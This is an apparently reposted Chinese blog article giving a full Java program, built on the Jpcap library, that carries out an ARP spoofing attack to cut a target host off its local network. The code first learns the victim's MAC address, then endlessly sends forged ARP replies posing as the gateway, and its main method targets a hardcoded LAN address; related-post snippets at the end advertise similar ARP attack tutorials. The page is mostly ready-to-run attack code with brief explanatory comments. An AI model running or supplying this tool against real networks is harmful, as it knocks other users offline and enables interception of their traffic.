2. 程式人生 > >基於Jpcap的Java ARP斷網攻擊

基於Jpcap的Java ARP斷網攻擊

阿新 發佈:2019-01-31

下面的程式碼執行前需要安裝jpcap,安裝方法百度一下很多,不過需要注意版本~

程式碼註釋還比較多,部分同學可能還需瞭解一些計算機網路的知識才能看懂

package com.arpattack;
   
import java.io.IOException;
import java.net.InetAddress;
import java.util.Arrays;
   
import jpcap.JpcapCaptor;
import jpcap.JpcapSender;
import jpcap.NetworkInterface;
import jpcap.packet.ARPPacket;
import jpcap.packet.EthernetPacket;
import jpcap.packet.Packet;
   
/**
* 基於Jpcap的ARP攻擊程式範例
* @author 陳祖煌
* @version 1.0
*/
public class ARPAttack {
   
        /**
        * 本地主機的0號網路裝置,根據具體實際情況對引數0進行修改
        */
        public static NetworkInterface device = JpcapCaptor.getDeviceList()[0];
   
        /**
        * 通過傳送ARP請求包來獲取某一IP地址主機的MAC地址。
        * @param ip //未知MAC地址主機的IP地址
        * @return //已知IP地址的MAC地址
        * @throws IOException
        */
        public static byte[] getOtherMAC(String ip) throws IOException{
                JpcapCaptor jc = JpcapCaptor.openDevice(device,2000,false,3000); //開啟網路裝置,用來偵聽
                JpcapSender sender = jc.getJpcapSenderInstance(); //傳送器JpcapSender,用來發送報文
                InetAddress senderIP = InetAddress.getByName("10.96.33.232"); //設定本地主機的IP地址,方便接收對方返回的報文
                InetAddress targetIP = InetAddress.getByName(ip); //目標主機的IP地址
   
                ARPPacket arp=new ARPPacket(); //開始構造一個ARP包
                arp.hardtype=ARPPacket.HARDTYPE_ETHER; //硬體型別
                arp.prototype=ARPPacket.PROTOTYPE_IP; //協議型別
                arp.operation=ARPPacket.ARP_REQUEST; //指明是ARP請求包
                arp.hlen=6; //實體地址長度
                arp.plen=4; //協議地址長度
                arp.sender_hardaddr=device.mac_address; //ARP包的傳送端乙太網地址,在這裡即本地主機地址
                arp.sender_protoaddr=senderIP.getAddress(); //傳送端IP地址, 在這裡即本地IP地址
   
                byte[] broadcast=new byte[]{(byte)255,(byte)255,(byte)255,(byte)255,(byte)255,(byte)255}; //廣播地址
                arp.target_hardaddr=broadcast; //設定目的端的乙太網地址為廣播地址
                arp.target_protoaddr=targetIP.getAddress(); //目的端IP地址
   
                //構造以太幀首部
                EthernetPacket ether=new EthernetPacket();
                ether.frametype=EthernetPacket.ETHERTYPE_ARP; //幀型別
                ether.src_mac=device.mac_address; //源MAC地址
                ether.dst_mac=broadcast; //乙太網目的地址,廣播地址
                arp.datalink=ether; //將arp報文的資料鏈路層的幀設定為剛剛構造的以太幀賦給
   
                sender.sendPacket(arp); //傳送ARP報文
   
                while(true){ //獲取ARP回覆包,從中提取出目的主機的MAC地址,如果返回的是閘道器地址,表明目的IP不是區域網內的地址
                        Packet packet = jc.getPacket();
                        if(packet instanceof ARPPacket){
                                ARPPacket p=(ARPPacket)packet;
                                if(p==null){
                                        throw new IllegalArgumentException(targetIP+" is not a local address"); //這種情況也屬於目的主機不是本地地址
                                 }
                                if(Arrays.equals(p.target_protoaddr,senderIP.getAddress())){
                                        System.out.println("get mac ok");
                                        return p.sender_hardaddr; //返回
                                }
                        }
                }
        }
   
        /**
        * 將字串形式的MAC地址轉換成存放在byte陣列內的MAC地址
        * @param str 字串形式的MAC地址,如:AA-AA-AA-AA-AA
        * @return 儲存在byte陣列內的MAC地址
        */
        public static byte[] stomac(String str) {
                byte[] mac = new byte[] { (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00 };
                String[] temp = str.split("-");
                for (int x = 0; x < temp.length; x++) {
                        mac[x] = (byte) ((Integer.parseInt(temp[x], 16)) & 0xff);
                }
                return mac;
        }
   
        /**
        * 執行ARP斷網攻擊。原理是:冒充閘道器傳送出來的ARP應答包,令接收端更改其ARP快取表,修改閘道器IP地址對應的MAC地址,從而令資料無法正常通過閘道器發出。
        * @param ip
        * @param time
        * @throws InterruptedException
        * @throws IOException
        */
        public static void ARPAttack(String ip, int time) throws InterruptedException, IOException{
                JpcapCaptor jpcap = JpcapCaptor.openDevice(device, 65535, false, 3000);
                jpcap.setFilter("arp", true);
                JpcapSender sender = JpcapSender.openDevice(device);
   
                ARPPacket arp = new ARPPacket();
                arp.hardtype = ARPPacket.HARDTYPE_ETHER;//硬體型別
                arp.prototype = ARPPacket.PROTOTYPE_IP; //協議型別
                arp.operation = ARPPacket.ARP_REPLY; //指明是ARP應答包包
                arp.hlen = 6;
                arp.plen = 4;
   
                byte[] srcmac = stomac("00-0D-2B-2E-B1-0A"); // 偽裝的MAC地址,這裡亂寫就行,不過要符合格式、十六進位制
                arp.sender_hardaddr = srcmac;
                arp.sender_protoaddr = InetAddress.getByName("10.96.0.1").getAddress();
   
                arp.target_hardaddr=getOtherMAC(ip);
                arp.target_protoaddr=InetAddress.getByName(ip).getAddress();
   
                //設定資料鏈路層的幀
                EthernetPacket ether=new EthernetPacket();
                ether.frametype=EthernetPacket.ETHERTYPE_ARP;
                ether.src_mac= srcmac; //停止攻擊一段時間後,目標主機會自動恢復網路。若要主動恢復,這裡可用getOtherMAC("10.96.0.1");
                ether.dst_mac=getOtherMAC(ip);
                arp.datalink=ether;
   
                // 傳送ARP應答包 。因為一般主機會間隔一定時間傳送ARP請求包詢問閘道器地址,所以這裡需要設定一個攻擊週期。
                while (true) {
                        System.out.println("sending ARP..");
                        sender.sendPacket(arp);
                        Thread.sleep(time);
                }
        }
   
  
        /**
        * 程式入口
        * @param args
        * @throws IOException
        * @throws InterruptedException
        */
        public static void main(String[] args) throws InterruptedException, IOException {
                ARPAttack("10.96.81.56", 2000);
        }
}


相關推薦

基於Jpcap的Java ARP攻擊

下面的程式碼執行前需要安裝jpcap,安裝方法百度一下很多,不過需要注意版本~ 程式碼註釋還比較多,部分同學可能還需瞭解一些計算機網路的知識才能看懂 package com.arpattack; import java.io.IOException; impor

區域網arp攻擊

宣告:本文章只用於學習交流,讀者若做出非法行為與本人無關!!! 歡迎有興趣的小夥伴前來交流,交流群號:892747839 今天給大家簡單介紹一下arp的斷網攻擊的原理。 一、我們首先登陸kali系統,這裡我用的是虛擬機器 這裡我用我的虛擬機器(kali)攻擊我的實體機(Win10

使用Kali進行ARP攻擊

使用Kali進行ARP斷網攻擊 ARP(Address Resolution Protocol),地址解析協議,是根據IP地址獲取實體地址的一個TCP/IP協議。 主機傳送資訊時將包含目標IP地址的ARP請求廣播到網路上的所有主機,並接收返回訊息,以此確定目標的實體地址; 收到返

kali學習筆記——區域網arp攻擊

什麼是arp斷網攻擊     簡單來說就是就是通過偽造IP地址和MAC地址實現ARP欺騙,能夠在網路中產生大量的ARP通訊量使網路阻塞,攻擊者只要持續不斷的發出偽造的ARP響應包就能更改目標主機ARP快取中的IP-MAC條目,造成網路中斷或中間人攻擊

linux 下的局域攻擊arp欺騙

pro 圖片 war 目標 掃描 關閉 主機 斷網 sys arp欺騙: /*正常情況下 電腦是將流量發送到網關 而欺騙後 則將流量傳到此機器的網卡上 再由此機器進行轉發至網關*/ --》 first: 使用fping -asg ip段/*掃描段內存活的主機*/ --》

ARP區域網攻擊原理分析及演示

ARP區域網斷網攻擊分析及演示 ARP斷網攻擊,是針對乙太網地址解析協議(ARP)的一種攻擊技術。此種攻擊可讓攻擊者取得區域網上的資料封包甚至可篡改封包,且可讓網路上特定計算機或所有計算機無法正常連線

用kali執行arp攻擊-----------使對方

實現原理 其主要原理是區域網內的"攻擊機"通過冒充同網路號下的"受害者主機"的實體地址(mac地址),通過欺騙閘道器,讓閘道器原來應該發給“受害者主機”的資料包轉而發給“攻擊機”,這就導致了“受害者主機”無法收到應答的資料包,也就等於斷網了。本實驗的過程也就是常說的  ARP

讓狗舍友決賽圈的時候難道有錯嗎?ARP攻擊筆記

檢查 抓取 哪些 上不了網 數據流 緩存 取圖 echo 中間人 arp欺騙攻擊只能局域網 跨網段ARP攻擊文檔 https://blog.csdn.net/magicbreaker/article/details/1538800 ##1. ARP協議簡介ARP是一種解

h5 時,返回上一個頁面 demo (與檢測絡代碼相結合,更直觀看到結果)

oct width 加載 doctype lin 測試 htm mini offline 頁面一: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8">

基於NIO的Netty絡框架

line 應用層協議 一個 select 進制 img 商業 機制 pro Netty是一個高性能、異步事件驅動的NIO框架,它提供了對TCP、UDP和文件傳輸的支持,Netty的所有IO操作都是異步非阻塞的,通過Future-Listener機制,用戶可以方便的

基於圖卷積絡的圖深度學習

理論 cdn image 深度 大名 end 但我 github 圖像識別 基於圖卷積網絡的圖深度學習 先簡單回顧一下,深度學習到底幹成功了哪些事情! 深度學習近些年在語音識別,圖片識別,自然語音處理等領域可謂是屢建奇功。ImageNet:是一個計算機視

MACBOOK 總是怎麽辦

images idt http ima width macbook 技術 斷網 wifi MACBOOK 連接 wifi 老是斷網。焦躁不安 看圖,二個方法,第一就搞定,?? 留存一份。 MACBOOK 總是斷網怎麽辦

公司上網速度極慢()解決思路_絡TS

網絡問題ts20171107 下午5點接到下屬單位反饋,上網速度很慢 前因:修改了專線的路由現象:公司所有電腦的QQ、微信都可以上,但是網頁打開速度超級慢,需要等3-5分鐘他把原來核心交換機的配置文件恢復到了之前的備份還是不行我這裏聽了詳細,判斷可能是DNS出了問題,ping DNS 服務器正常把DNS

服務器內外不通只能重啟解決,搞了半天原來是route在搞鬼

外網 lock 機房 現在 fault body 網路 報錯 自啟 關於我入坑 公司新項目上線前肯定要做測試,我們測試的平臺搭建在一臺R720服務器上,因為這臺服務器在本地搭建的時候我用的是第二塊網卡,所以本地給了網卡配置了網關(也就是公司的外網路由地址)用來連接我的電腦

Swarm基於多主機容器絡-overlay networks 梳理

沒有 網絡 連接 管理工具 dock swarm集群 們的 replicas aos 前面介紹了Docker管理工具-Swarm部署記錄,下面重點說下Swarm基於多主機容器通信的覆蓋網絡在Docker版本1.12之後swarm模式原生支持覆蓋網絡(overlay netw

Scapy交互式arp掃描與攻擊

Scapy交互式arp掃描與攻擊1、局域網Arp掃描:1) 簡單實現:(復雜實現定義為方法別人可以自動實現獲取自己IP地址所在段或者直接定義循環IP地址) >>arp2=srp(Ether(dst=‘FF:FF:FF:FF:FF:FF‘)/ARP(op=1,hwdst=‘00:00:00:00

CentOS7.4安裝及問題解決方案

網絡 ont 區域 選擇 問題解決 ica 解決方案 目錄 start CentOS7.4安裝步驟 1、選擇時區 選擇上海時區 2、選擇圖形界面 勾選GNOME Desktp圖形界面。 3、選擇分區 選擇手動分區 選擇分區

基於UDP協議的絡程序

UDP socket下圖是基於UDP協議的客戶端/服務器程序的一般流程:圖1.1 UDP協議通信流程UDP套接口是無連接的、不可靠的數據報協議;既然他不可靠為什麽還要用呢?其一:當應用程序使用廣播或多播時只能使用UDP協議;其二:由於他是無連接的,所以速度快。因為UDP套接口是無連接的,如果一方的數據報丟失,

配置HSRP——實現用戶無感知

熱備份路由HSRP:熱備份路由器協議是cisco的私有協議。該協議中含有多臺路由器,對應一個HSRP組。該組中只有一個路由器承擔轉發用戶流量的職責,這就是活躍路由器。當活躍路由器失效後,備份路由器將承擔該職責,成為新的活躍路由器。這就是熱備份的原理。實現HSRP的條件是系統中有多臺路由器,它們組成一個“熱備份

問題:linux系統經常出現的情況,重啟之後系統恢復正常

version pps PC -a process license boot term 更新 系統突然之間就斷網了,在messge日誌裏看到:Jun 29 14:23:52 localhost kernel: WARNING: at net/sched/sch_generi